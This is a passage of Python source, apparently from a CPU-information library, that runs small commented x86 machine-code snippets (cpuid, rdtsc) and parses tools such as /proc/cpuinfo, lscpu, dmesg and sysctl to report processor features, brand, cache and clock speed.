# http://en.wikipedia.org/wiki/CPUID#EAX.3D1:_Processor_Info_and_Feature_Bits
def get_info(self):
# EAX
eax = self._run_asm(
self._one_eax(),
b"\x0f\xa2" # cpuid
b"\xC3" # ret
)
# Get the CPU info
stepping = (eax >> 0) & 0xF # 4 bits
model = (eax >> 4) & 0xF # 4 bits
family = (eax >> 8) & 0xF # 4 bits
processor_type = (eax >> 12) & 0x3 # 2 bits
extended_model = (eax >> 16) & 0xF # 4 bits
extended_family = (eax >> 20) & 0xFF # 8 bits
return {
'stepping' : stepping,
'model' : model,
'family' : family,
'processor_type' : processor_type,
'extended_model' : extended_model,
'extended_family' : extended_family
}
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000000h:_Get_Highest_Extended_Function_Supported
def get_max_extension_support(self):
# Check for extension support
max_extension_support = self._run_asm(
b"\xB8\x00\x00\x00\x80" # mov ax,0x80000000
b"\x0f\xa2" # cpuid
b"\xC3" # ret
)
return max_extension_support
# http://en.wikipedia.org/wiki/CPUID#EAX.3D1:_Processor_Info_and_Feature_Bits
def get_flags(self, max_extension_support):
# EDX
edx = self._run_asm(
self._one_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
self._one_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the CPU flags
flags = {
'fpu' : is_bit_set(edx, 0),
'vme' : is_bit_set(edx, 1),
'de' : is_bit_set(edx, 2),
'pse' : is_bit_set(edx, 3),
'tsc' : is_bit_set(edx, 4),
'msr' : is_bit_set(edx, 5),
'pae' : is_bit_set(edx, 6),
'mce' : is_bit_set(edx, 7),
'cx8' : is_bit_set(edx, 8),
'apic' : is_bit_set(edx, 9),
#'reserved1' : is_bit_set(edx, 10),
'sep' : is_bit_set(edx, 11),
'mtrr' : is_bit_set(edx, 12),
'pge' : is_bit_set(edx, 13),
'mca' : is_bit_set(edx, 14),
'cmov' : is_bit_set(edx, 15),
'pat' : is_bit_set(edx, 16),
'pse36' : is_bit_set(edx, 17),
'pn' : is_bit_set(edx, 18),
'clflush' : is_bit_set(edx, 19),
#'reserved2' : is_bit_set(edx, 20),
'dts' : is_bit_set(edx, 21),
'acpi' : is_bit_set(edx, 22),
'mmx' : is_bit_set(edx, 23),
'fxsr' : is_bit_set(edx, 24),
'sse' : is_bit_set(edx, 25),
'sse2' : is_bit_set(edx, 26),
'ss' : is_bit_set(edx, 27),
'ht' : is_bit_set(edx, 28),
'tm' : is_bit_set(edx, 29),
'ia64' : is_bit_set(edx, 30),
'pbe' : is_bit_set(edx, 31),
'pni' : is_bit_set(ecx, 0),
'pclmulqdq' : is_bit_set(ecx, 1),
'dtes64' : is_bit_set(ecx, 2),
'monitor' : is_bit_set(ecx, 3),
'ds_cpl' : is_bit_set(ecx, 4),
'vmx' : is_bit_set(ecx, 5),
'smx' : is_bit_set(ecx, 6),
'est' : is_bit_set(ecx, 7),
'tm2' : is_bit_set(ecx, 8),
'ssse3' : is_bit_set(ecx, 9),
'cid' : is_bit_set(ecx, 10),
#'reserved3' : is_bit_set(ecx, 11),
'fma' : is_bit_set(ecx, 12),
'cx16' : is_bit_set(ecx, 13),
'xtpr' : is_bit_set(ecx, 14),
'pdcm' : is_bit_set(ecx, 15),
#'reserved4' : is_bit_set(ecx, 16),
'pcid' : is_bit_set(ecx, 17),
'dca' : is_bit_set(ecx, 18),
'sse4_1' : is_bit_set(ecx, 19),
'sse4_2' : is_bit_set(ecx, 20),
'x2apic' : is_bit_set(ecx, 21),
'movbe' : is_bit_set(ecx, 22),
'popcnt' : is_bit_set(ecx, 23),
'tscdeadline' : is_bit_set(ecx, 24),
'aes' : is_bit_set(ecx, 25),
'xsave' : is_bit_set(ecx, 26),
'osxsave' : is_bit_set(ecx, 27),
'avx' : is_bit_set(ecx, 28),
'f16c' : is_bit_set(ecx, 29),
'rdrnd' : is_bit_set(ecx, 30),
'hypervisor' : is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
# http://en.wikipedia.org/wiki/CPUID#EAX.3D7.2C_ECX.3D0:_Extended_Features
if max_extension_support >= 7:
# EBX
ebx = self._run_asm(
self._zero_ecx(),
b"\xB8\x07\x00\x00\x00" # mov eax,7
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
self._zero_ecx(),
b"\xB8\x07\x00\x00\x00" # mov eax,7
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the extended CPU flags
extended_flags = {
#'fsgsbase' : is_bit_set(ebx, 0),
#'IA32_TSC_ADJUST' : is_bit_set(ebx, 1),
'sgx' : is_bit_set(ebx, 2),
'bmi1' : is_bit_set(ebx, 3),
'hle' : is_bit_set(ebx, 4),
'avx2' : is_bit_set(ebx, 5),
#'reserved' : is_bit_set(ebx, 6),
'smep' : is_bit_set(ebx, 7),
'bmi2' : is_bit_set(ebx, 8),
'erms' : is_bit_set(ebx, 9),
'invpcid' : is_bit_set(ebx, 10),
'rtm' : is_bit_set(ebx, 11),
'pqm' : is_bit_set(ebx, 12),
#'FPU CS and FPU DS deprecated' : is_bit_set(ebx, 13),
'mpx' : is_bit_set(ebx, 14),
'pqe' : is_bit_set(ebx, 15),
'avx512f' : is_bit_set(ebx, 16),
'avx512dq' : is_bit_set(ebx, 17),
'rdseed' : is_bit_set(ebx, 18),
'adx' : is_bit_set(ebx, 19),
'smap' : is_bit_set(ebx, 20),
'avx512ifma' : is_bit_set(ebx, 21),
'pcommit' : is_bit_set(ebx, 22),
'clflushopt' : is_bit_set(ebx, 23),
'clwb' : is_bit_set(ebx, 24),
'intel_pt' : is_bit_set(ebx, 25),
'avx512pf' : is_bit_set(ebx, 26),
'avx512er' : is_bit_set(ebx, 27),
'avx512cd' : is_bit_set(ebx, 28),
'sha' : is_bit_set(ebx, 29),
'avx512bw' : is_bit_set(ebx, 30),
'avx512vl' : is_bit_set(ebx, 31),
'prefetchwt1' : is_bit_set(ecx, 0),
'avx512vbmi' : is_bit_set(ecx, 1),
'umip' : is_bit_set(ecx, 2),
'pku' : is_bit_set(ecx, 3),
'ospke' : is_bit_set(ecx, 4),
#'reserved' : is_bit_set(ecx, 5),
'avx512vbmi2' : is_bit_set(ecx, 6),
#'reserved' : is_bit_set(ecx, 7),
'gfni' : is_bit_set(ecx, 8),
'vaes' : is_bit_set(ecx, 9),
'vpclmulqdq' : is_bit_set(ecx, 10),
'avx512vnni' : is_bit_set(ecx, 11),
'avx512bitalg' : is_bit_set(ecx, 12),
#'reserved' : is_bit_set(ecx, 13),
'avx512vpopcntdq' : is_bit_set(ecx, 14),
#'reserved' : is_bit_set(ecx, 15),
#'reserved' : is_bit_set(ecx, 16),
#'mpx0' : is_bit_set(ecx, 17),
#'mpx1' : is_bit_set(ecx, 18),
#'mpx2' : is_bit_set(ecx, 19),
#'mpx3' : is_bit_set(ecx, 20),
#'mpx4' : is_bit_set(ecx, 21),
'rdpid' : is_bit_set(ecx, 22),
#'reserved' : is_bit_set(ecx, 23),
#'reserved' : is_bit_set(ecx, 24),
#'reserved' : is_bit_set(ecx, 25),
#'reserved' : is_bit_set(ecx, 26),
#'reserved' : is_bit_set(ecx, 27),
#'reserved' : is_bit_set(ecx, 28),
#'reserved' : is_bit_set(ecx, 29),
'sgx_lc' : is_bit_set(ecx, 30),
#'reserved' : is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
extended_flags = [k for k, v in extended_flags.items() if v]
flags += extended_flags
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000001h:_Extended_Processor_Info_and_Feature_Bits
if max_extension_support >= 0x80000001:
# EBX
ebx = self._run_asm(
b"\xB8\x01\x00\x00\x80" # mov ax,0x80000001
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\xB8\x01\x00\x00\x80" # mov ax,0x80000001
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the extended CPU flags
extended_flags = {
'fpu' : is_bit_set(ebx, 0),
'vme' : is_bit_set(ebx, 1),
'de' : is_bit_set(ebx, 2),
'pse' : is_bit_set(ebx, 3),
'tsc' : is_bit_set(ebx, 4),
'msr' : is_bit_set(ebx, 5),
'pae' : is_bit_set(ebx, 6),
'mce' : is_bit_set(ebx, 7),
'cx8' : is_bit_set(ebx, 8),
'apic' : is_bit_set(ebx, 9),
#'reserved' : is_bit_set(ebx, 10),
'syscall' : is_bit_set(ebx, 11),
'mtrr' : is_bit_set(ebx, 12),
'pge' : is_bit_set(ebx, 13),
'mca' : is_bit_set(ebx, 14),
'cmov' : is_bit_set(ebx, 15),
'pat' : is_bit_set(ebx, 16),
'pse36' : is_bit_set(ebx, 17),
#'reserved' : is_bit_set(ebx, 18),
'mp' : is_bit_set(ebx, 19),
'nx' : is_bit_set(ebx, 20),
#'reserved' : is_bit_set(ebx, 21),
'mmxext' : is_bit_set(ebx, 22),
'mmx' : is_bit_set(ebx, 23),
'fxsr' : is_bit_set(ebx, 24),
'fxsr_opt' : is_bit_set(ebx, 25),
'pdpe1gp' : is_bit_set(ebx, 26),
'rdtscp' : is_bit_set(ebx, 27),
#'reserved' : is_bit_set(ebx, 28),
'lm' : is_bit_set(ebx, 29),
'3dnowext' : is_bit_set(ebx, 30),
'3dnow' : is_bit_set(ebx, 31),
'lahf_lm' : is_bit_set(ecx, 0),
'cmp_legacy' : is_bit_set(ecx, 1),
'svm' : is_bit_set(ecx, 2),
'extapic' : is_bit_set(ecx, 3),
'cr8_legacy' : is_bit_set(ecx, 4),
'abm' : is_bit_set(ecx, 5),
'sse4a' : is_bit_set(ecx, 6),
'misalignsse' : is_bit_set(ecx, 7),
'3dnowprefetch' : is_bit_set(ecx, 8),
'osvw' : is_bit_set(ecx, 9),
'ibs' : is_bit_set(ecx, 10),
'xop' : is_bit_set(ecx, 11),
'skinit' : is_bit_set(ecx, 12),
'wdt' : is_bit_set(ecx, 13),
#'reserved' : is_bit_set(ecx, 14),
'lwp' : is_bit_set(ecx, 15),
'fma4' : is_bit_set(ecx, 16),
'tce' : is_bit_set(ecx, 17),
#'reserved' : is_bit_set(ecx, 18),
'nodeid_msr' : is_bit_set(ecx, 19),
#'reserved' : is_bit_set(ecx, 20),
'tbm' : is_bit_set(ecx, 21),
'topoext' : is_bit_set(ecx, 22),
'perfctr_core' : is_bit_set(ecx, 23),
'perfctr_nb' : is_bit_set(ecx, 24),
#'reserved' : is_bit_set(ecx, 25),
'dbx' : is_bit_set(ecx, 26),
'perftsc' : is_bit_set(ecx, 27),
'pci_l2i' : is_bit_set(ecx, 28),
#'reserved' : is_bit_set(ecx, 29),
#'reserved' : is_bit_set(ecx, 30),
#'reserved' : is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
extended_flags = [k for k, v in extended_flags.items() if v]
flags += extended_flags
flags.sort()
return flags
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000002h.2C80000003h.2C80000004h:_Processor_Brand_String
def get_processor_brand(self, max_extension_support):
processor_brand = ""
# Processor brand string
if max_extension_support >= 0x80000004:
instructions = [
b"\xB8\x02\x00\x00\x80", # mov ax,0x80000002
b"\xB8\x03\x00\x00\x80", # mov ax,0x80000003
b"\xB8\x04\x00\x00\x80" # mov ax,0x80000004
]
for instruction in instructions:
# EAX
eax = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xC0" # mov ax,ax
b"\xC3" # ret
)
# EBX
ebx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# EDX
edx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# Combine each of the 4 bytes in each register into the string
for reg in [eax, ebx, ecx, edx]:
for n in [0, 8, 16, 24]:
processor_brand += chr((reg >> n) & 0xFF)
# Strip off any trailing NULL terminators and white space
processor_brand = processor_brand.strip("\0").strip()
return processor_brand
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000006h:_Extended_L2_Cache_Features
def get_cache(self, max_extension_support):
cache_info = {}
# Just return if the cache feature is not supported
if max_extension_support < 0x80000006:
return cache_info
# ECX
ecx = self._run_asm(
b"\xB8\x06\x00\x00\x80" # mov ax,0x80000006
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
cache_info = {
'size_kb' : ecx & 0xFF,
'line_size_b' : (ecx >> 12) & 0xF,
'associativity' : (ecx >> 16) & 0xFFFF
}
return cache_info
def get_ticks(self):
retval = None
if DataSource.bits == '32bit':
# Works on x86_32
restype = None
argtypes = (ctypes.POINTER(ctypes.c_uint), ctypes.POINTER(ctypes.c_uint))
get_ticks_x86_32, address = self._asm_func(restype, argtypes,
[
b"\x55", # push bp
b"\x89\xE5", # mov bp,sp
b"\x31\xC0", # xor ax,ax
b"\x0F\xA2", # cpuid
b"\x0F\x31", # rdtsc
b"\x8B\x5D\x08", # mov bx,[di+0x8]
b"\x8B\x4D\x0C", # mov cx,[di+0xc]
b"\x89\x13", # mov [bp+di],dx
b"\x89\x01", # mov [bx+di],ax
b"\x5D", # pop bp
b"\xC3" # ret
]
)
high = ctypes.c_uint32(0)
low = ctypes.c_uint32(0)
get_ticks_x86_32(ctypes.byref(high), ctypes.byref(low))
retval = ((high.value << 32) & 0xFFFFFFFF00000000) | low.value
elif DataSource.bits == '64bit':
# Works on x86_64
restype = ctypes.c_uint64
argtypes = ()
get_ticks_x86_64, address = self._asm_func(restype, argtypes,
[
b"\x48", # dec ax
b"\x31\xC0", # xor ax,ax
b"\x0F\xA2", # cpuid
b"\x0F\x31", # rdtsc
b"\x48", # dec ax
b"\xC1\xE2\x20", # shl dx,byte 0x20
b"\x48", # dec ax
b"\x09\xD0", # or ax,dx
b"\xC3", # ret
]
)
retval = get_ticks_x86_64()
return retval
def get_raw_hz(self):
start = self.get_ticks()
time.sleep(1)
end = self.get_ticks()
ticks = (end - start)
return ticks
def _actual_get_cpu_info_from_cpuid(queue):
'''
Warning! This function has the potential to crash the Python runtime.
Do not call it directly. Use the _get_cpu_info_from_cpuid function instead.
It will safely call this function in another process.
'''
# Pipe all output to nothing
sys.stdout = open(os.devnull, 'w')
sys.stderr = open(os.devnull, 'w')
# Get the CPU arch and bits
arch, bits = parse_arch(DataSource.raw_arch_string)
# Return none if this is not an X86 CPU
if not arch in ['X86_32', 'X86_64']:
queue.put(obj_to_b64({}))
return
# Return none if SE Linux is in enforcing mode
cpuid = CPUID()
if cpuid.is_selinux_enforcing:
queue.put(obj_to_b64({}))
return
# Get the cpu info from the CPUID register
max_extension_support = cpuid.get_max_extension_support()
cache_info = cpuid.get_cache(max_extension_support)
info = cpuid.get_info()
processor_brand = cpuid.get_processor_brand(max_extension_support)
# Get the Hz and scale
hz_actual = cpuid.get_raw_hz()
hz_actual = to_hz_string(hz_actual)
# Get the Hz and scale
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
info = {
'vendor_id' : cpuid.get_vendor_id(),
'hardware' : '',
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, 0),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, 0),
'l2_cache_size' : to_friendly_bytes(cache_info['size_kb']),
'l2_cache_line_size' : cache_info['line_size_b'],
'l2_cache_associativity' : hex(cache_info['associativity']),
'stepping' : info['stepping'],
'model' : info['model'],
'family' : info['family'],
'processor_type' : info['processor_type'],
'extended_model' : info['extended_model'],
'extended_family' : info['extended_family'],
'flags' : cpuid.get_flags(max_extension_support)
}
info = {k: v for k, v in info.items() if v}
queue.put(obj_to_b64(info))
def _get_cpu_info_from_cpuid():
'''
Returns the CPU info gathered by querying the X86 cpuid register in a new process.
Returns {} on non X86 cpus.
Returns {} if SELinux is in enforcing mode.
'''
from multiprocessing import Process, Queue
# Return {} if can't cpuid
if not DataSource.can_cpuid:
return {}
# Get the CPU arch and bits
arch, bits = parse_arch(DataSource.raw_arch_string)
# Return {} if this is not an X86 CPU
if not arch in ['X86_32', 'X86_64']:
return {}
try:
# Start running the function in a subprocess
queue = Queue()
p = Process(target=_actual_get_cpu_info_from_cpuid, args=(queue,))
p.start()
# Wait for the process to end, while it is still alive
while p.is_alive():
p.join(0)
# Return {} if it failed
if p.exitcode != 0:
return {}
# Return the result, only if there is something to read
if not queue.empty():
output = queue.get()
return b64_to_obj(output)
except:
pass
# Return {} if everything failed
return {}
def _get_cpu_info_from_proc_cpuinfo():
'''
Returns the CPU info gathered from /proc/cpuinfo.
Returns {} if /proc/cpuinfo is not found.
'''
try:
# Just return {} if there is no cpuinfo
if not DataSource.has_proc_cpuinfo():
return {}
returncode, output = DataSource.cat_proc_cpuinfo()
if returncode != 0:
return {}
# Various fields
vendor_id = _get_field(False, output, None, '', 'vendor_id', 'vendor id', 'vendor')
processor_brand = _get_field(True, output, None, None, 'model name','cpu', 'processor')
cache_size = _get_field(False, output, None, '', 'cache size')
stepping = _get_field(False, output, int, 0, 'stepping')
model = _get_field(False, output, int, 0, 'model')
family = _get_field(False, output, int, 0, 'cpu family')
hardware = _get_field(False, output, None, '', 'Hardware')
# Flags
flags = _get_field(False, output, None, None, 'flags', 'Features')
if flags:
flags = flags.split()
flags.sort()
# Convert from MHz string to Hz
hz_actual = _get_field(False, output, None, '', 'cpu MHz', 'cpu speed', 'clock')
hz_actual = hz_actual.lower().rstrip('mhz').strip()
hz_actual = to_hz_string(hz_actual)
# Convert from GHz/MHz string to Hz
scale, hz_advertised = (0, None)
try:
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
except Exception:
pass
info = {
'hardware' : hardware,
'brand' : processor_brand,
'l3_cache_size' : to_friendly_bytes(cache_size),
'flags' : flags,
'vendor_id' : vendor_id,
'stepping' : stepping,
'model' : model,
'family' : family,
}
# Make the Hz the same for actual and advertised if missing any
if not hz_advertised or hz_advertised == '0.0':
hz_advertised = hz_actual
scale = 6
elif not hz_actual or hz_actual == '0.0':
hz_actual = hz_advertised
# Add the Hz if there is one
if to_raw_hz(hz_advertised, scale) > (0, 0):
info['hz_advertised'] = to_friendly_hz(hz_advertised, scale)
info['hz_advertised_raw'] = to_raw_hz(hz_advertised, scale)
if to_raw_hz(hz_actual, scale) > (0, 0):
info['hz_actual'] = to_friendly_hz(hz_actual, 6)
info['hz_actual_raw'] = to_raw_hz(hz_actual, 6)
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_cpufreq_info():
'''
Returns the CPU info gathered from cpufreq-info.
Returns {} if cpufreq-info is not found.
'''
try:
scale, hz_brand = 1, '0.0'
if not DataSource.has_cpufreq_info():
return {}
returncode, output = DataSource.cpufreq_info()
if returncode != 0:
return {}
hz_brand = output.split('current CPU frequency is')[1].split('\n')[0]
i = hz_brand.find('Hz')
assert(i != -1)
hz_brand = hz_brand[0 : i+2].strip().lower()
if hz_brand.endswith('mhz'):
scale = 6
elif hz_brand.endswith('ghz'):
scale = 9
hz_brand = hz_brand.rstrip('mhz').rstrip('ghz').strip()
hz_brand = to_hz_string(hz_brand)
info = {
'hz_advertised' : to_friendly_hz(hz_brand, scale),
'hz_actual' : to_friendly_hz(hz_brand, scale),
'hz_advertised_raw' : to_raw_hz(hz_brand, scale),
'hz_actual_raw' : to_raw_hz(hz_brand, scale),
}
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_lscpu():
'''
Returns the CPU info gathered from lscpu.
Returns {} if lscpu is not found.
'''
try:
if not DataSource.has_lscpu():
return {}
returncode, output = DataSource.lscpu()
if returncode != 0:
return {}
info = {}
new_hz = _get_field(False, output, None, None, 'CPU max MHz', 'CPU MHz')
if new_hz:
new_hz = to_hz_string(new_hz)
scale = 6
info['hz_advertised'] = to_friendly_hz(new_hz, scale)
info['hz_actual'] = to_friendly_hz(new_hz, scale)
info['hz_advertised_raw'] = to_raw_hz(new_hz, scale)
info['hz_actual_raw'] = to_raw_hz(new_hz, scale)
vendor_id = _get_field(False, output, None, None, 'Vendor ID')
if vendor_id:
info['vendor_id'] = vendor_id
brand = _get_field(False, output, None, None, 'Model name')
if brand:
info['brand'] = brand
family = _get_field(False, output, None, None, 'CPU family')
if family and family.isdigit():
info['family'] = int(family)
stepping = _get_field(False, output, None, None, 'Stepping')
if stepping and stepping.isdigit():
info['stepping'] = int(stepping)
model = _get_field(False, output, None, None, 'Model')
if model and model.isdigit():
info['model'] = int(model)
l1_data_cache_size = _get_field(False, output, None, None, 'L1d cache')
if l1_data_cache_size:
info['l1_data_cache_size'] = to_friendly_bytes(l1_data_cache_size)
l1_instruction_cache_size = _get_field(False, output, None, None, 'L1i cache')
if l1_instruction_cache_size:
info['l1_instruction_cache_size'] = to_friendly_bytes(l1_instruction_cache_size)
l2_cache_size = _get_field(False, output, None, None, 'L2 cache')
if l2_cache_size:
info['l2_cache_size'] = to_friendly_bytes(l2_cache_size)
l3_cache_size = _get_field(False, output, None, None, 'L3 cache')
if l3_cache_size:
info['l3_cache_size'] = to_friendly_bytes(l3_cache_size)
# Flags
flags = _get_field(False, output, None, None, 'flags', 'Features')
if flags:
flags = flags.split()
flags.sort()
info['flags'] = flags
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_dmesg():
'''
Returns the CPU info gathered from dmesg.
Returns {} if dmesg is not found or does not have the desired info.
'''
# Just return {} if there is no dmesg
if not DataSource.has_dmesg():
return {}
# If dmesg fails return {}
returncode, output = DataSource.dmesg_a()
if output == None or returncode != 0:
return {}
return _parse_dmesg_output(output)
# https://openpowerfoundation.org/wp-content/uploads/2016/05/LoPAPR_DRAFT_v11_24March2016_cmt1.pdf
# page 767
def _get_cpu_info_from_ibm_pa_features():
'''
Returns the CPU info gathered from lsprop /proc/device-tree/cpus/*/ibm,pa-features
Returns {} if lsprop is not found or ibm,pa-features does not have the desired info.
'''
try:
# Just return {} if there is no lsprop
if not DataSource.has_ibm_pa_features():
return {}
# If ibm,pa-features fails return {}
returncode, output = DataSource.ibm_pa_features()
if output == None or returncode != 0:
return {}
# Filter out invalid characters from output
value = output.split("ibm,pa-features")[1].lower()
value = [s for s in value if s in list('0123456789abcfed')]
value = ''.join(value)
# Get data converted to Uint32 chunks
left = int(value[0 : 8], 16)
right = int(value[8 : 16], 16)
# Get the CPU flags
flags = {
# Byte 0
'mmu' : is_bit_set(left, 0),
'fpu' : is_bit_set(left, 1),
'slb' : is_bit_set(left, 2),
'run' : is_bit_set(left, 3),
#'reserved' : is_bit_set(left, 4),
'dabr' : is_bit_set(left, 5),
'ne' : is_bit_set(left, 6),
'wtr' : is_bit_set(left, 7),
# Byte 1
'mcr' : is_bit_set(left, 8),
'dsisr' : is_bit_set(left, 9),
'lp' : is_bit_set(left, 10),
'ri' : is_bit_set(left, 11),
'dabrx' : is_bit_set(left, 12),
'sprg3' : is_bit_set(left, 13),
'rislb' : is_bit_set(left, 14),
'pp' : is_bit_set(left, 15),
# Byte 2
'vpm' : is_bit_set(left, 16),
'dss_2.05' : is_bit_set(left, 17),
#'reserved' : is_bit_set(left, 18),
'dar' : is_bit_set(left, 19),
#'reserved' : is_bit_set(left, 20),
'ppr' : is_bit_set(left, 21),
'dss_2.02' : is_bit_set(left, 22),
'dss_2.06' : is_bit_set(left, 23),
# Byte 3
'lsd_in_dscr' : is_bit_set(left, 24),
'ugr_in_dscr' : is_bit_set(left, 25),
#'reserved' : is_bit_set(left, 26),
#'reserved' : is_bit_set(left, 27),
#'reserved' : is_bit_set(left, 28),
#'reserved' : is_bit_set(left, 29),
#'reserved' : is_bit_set(left, 30),
#'reserved' : is_bit_set(left, 31),
# Byte 4
'sso_2.06' : is_bit_set(right, 0),
#'reserved' : is_bit_set(right, 1),
#'reserved' : is_bit_set(right, 2),
#'reserved' : is_bit_set(right, 3),
#'reserved' : is_bit_set(right, 4),
#'reserved' : is_bit_set(right, 5),
#'reserved' : is_bit_set(right, 6),
#'reserved' : is_bit_set(right, 7),
# Byte 5
'le' : is_bit_set(right, 8),
'cfar' : is_bit_set(right, 9),
'eb' : is_bit_set(right, 10),
'lsq_2.07' : is_bit_set(right, 11),
#'reserved' : is_bit_set(right, 12),
#'reserved' : is_bit_set(right, 13),
#'reserved' : is_bit_set(right, 14),
#'reserved' : is_bit_set(right, 15),
# Byte 6
'dss_2.07' : is_bit_set(right, 16),
#'reserved' : is_bit_set(right, 17),
#'reserved' : is_bit_set(right, 18),
#'reserved' : is_bit_set(right, 19),
#'reserved' : is_bit_set(right, 20),
#'reserved' : is_bit_set(right, 21),
#'reserved' : is_bit_set(right, 22),
#'reserved' : is_bit_set(right, 23),
# Byte 7
#'reserved' : is_bit_set(right, 24),
#'reserved' : is_bit_set(right, 25),
#'reserved' : is_bit_set(right, 26),
#'reserved' : is_bit_set(right, 27),
#'reserved' : is_bit_set(right, 28),
#'reserved' : is_bit_set(right, 29),
#'reserved' : is_bit_set(right, 30),
#'reserved' : is_bit_set(right, 31),
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
flags.sort()
info = {
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_cat_var_run_dmesg_boot():
'''
Returns the CPU info gathered from /var/run/dmesg.boot.
Returns {} if dmesg is not found or does not have the desired info.
'''
# Just return {} if there is no /var/run/dmesg.boot
if not DataSource.has_var_run_dmesg_boot():
return {}
# If dmesg.boot fails return {}
returncode, output = DataSource.cat_var_run_dmesg_boot()
if output == None or returncode != 0:
return {}
return _parse_dmesg_output(output)
def _get_cpu_info_from_sysctl():
'''
Returns the CPU info gathered from sysctl.
Returns {} if sysctl is not found.
'''
try:
# Just return {} if there is no sysctl
if not DataSource.has_sysctl():
return {}
# If sysctl fails return {}
returncode, output = DataSource.sysctl_machdep_cpu_hw_cpufrequency()
if output == None or returncode != 0:
return {}
# Various fields
vendor_id = _get_field(False, output, None, None, 'machdep.cpu.vendor')
processor_brand = _get_field(True, output, None, None, 'machdep.cpu.brand_string')
cache_size = _get_field(False, output, None, None, 'machdep.cpu.cache.size')
stepping = _get_field(False, output, int, 0, 'machdep.cpu.stepping')
model = _get_field(False, output, int, 0, 'machdep.cpu.model')
family = _get_field(False, output, int, 0, 'machdep.cpu.family')
# Flags
flags = _get_field(False, output, None, '', 'machdep.cpu.features').lower().split()
flags.extend(_get_field(False, output, None, '', 'machdep.cpu.leaf7_features').lower().split())
flags.extend(_get_field(False, output, None, '', 'machdep.cpu.extfeatures').lower().split())
flags.sort()
# Convert from GHz/MHz string to Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
hz_actual = _get_field(False, output, None, None, 'hw.cpufrequency')
hz_actual = to_hz_string(hz_actual)
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, 0),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, 0),
'l2_cache_size' : to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_sysinfo():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
info = _get_cpu_info_from_sysinfo_v1()
info.update(_get_cpu_info_from_sysinfo_v2())
return info
def _get_cpu_info_from_sysinfo_v1():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
try:
# Just return {} if there is no sysinfo
if not DataSource.has_sysinfo():
return {}
# If sysinfo fails return {}
returncode, output = DataSource.sysinfo_cpu()
if output == None or returncode != 0:
return {}
# Various fields
vendor_id = '' #_get_field(False, output, None, None, 'CPU #0: ')
processor_brand = output.split('CPU #0: "')[1].split('"\n')[0]
cache_size = '' #_get_field(False, output, None, None, 'machdep.cpu.cache.size')
stepping = int(output.split(', stepping ')[1].split(',')[0].strip())
model = int(output.split(', model ')[1].split(',')[0].strip())
family = int(output.split(', family ')[1].split(',')[0].strip())
# Flags
flags = []
for line in output.split('\n'):
if line.startswith('\t\t'):
for flag in line.strip().lower().split():
flags.append(flag)
flags.sort()
# Convert from GHz/MHz string to Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
hz_actual = hz_advertised
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, scale),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, scale),
'l2_cache_size' : to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_sysinfo_v2():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
try:
# Just return {} if there is no sysinfo
if not DataSource.has_sysinfo():
return {}
